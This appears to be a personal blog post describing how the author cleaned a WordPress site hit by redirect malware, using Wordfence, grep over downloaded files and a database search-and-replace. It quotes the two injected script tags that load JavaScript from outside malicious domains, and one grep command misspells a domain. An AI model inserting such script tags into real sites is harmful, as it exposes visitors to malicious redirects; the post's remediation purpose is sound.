Wordpress Malware: destinyfernandi or adsformarket

Published: 2021-01-23

Before you start

Whenever you start working on a site, always create a backup!

Issue

Today, a client told me to clean their site, which had redirects on every page making their site vulnerable and flagged by Google. Identifying the issue was very simple, “View source”. There I found the following.

script type='text/javascript' src='https://slow.destinyfernandi.com/same.js'></script>
script type='text/javascript' src='https://snippet.adsformarket.com/same.js'></script>

Identifying Unwanted Files with Wordfence

One of the things I usually do is run Wordfence. You just need this plugin to identify bad files really, and clean them manually via FTP. You can erase the plugin when you are done since depending on your server, it’s very likely it will slow it down.

Cleaning Files Manually

Now, I am on a Windows system, and I wanted to take a shortcut. I downloaded all the files via FTP, of course I zipped them first so that I could do this in less than a minute. If you have ssh access, you can gzip the whole Wordpress directory. If you use a panel of some sort, you can select everything and zip it.

Once extracted on my computer, with the help of git-scm, I opened a bash window where I was able to run Linux commands. I just had to run the following:

$ grep -ril destinygernandi *
$ grep -ril adsformarket *

Basically I wanted to search everywhere (search files recursively, ignoring upper and lowercases, and outputting matching files only).

I found all the files where the script was, and just went through them manually and erased them. Very simple and straightforward.

Cleaning Database

This step was simple, first I downloaded the ”Better Search Replace” plugin for Wordpress. Then I searched for the whole javascript string above, and replace it with nothing. This should take care of posts and pages where this appears. It even clears that string from the database itself.

Next, I logged in to the database with phpmyadmin. Exported the database and opened the exported database on my local computer. I did a simple search for the string that I wanted gone, if its not there anymore, you are basically done. If you have some instances, then you can easily locate them in your database and get rid of it.

Need Help?

You can always reach me at 📧 hey@vicentesan.com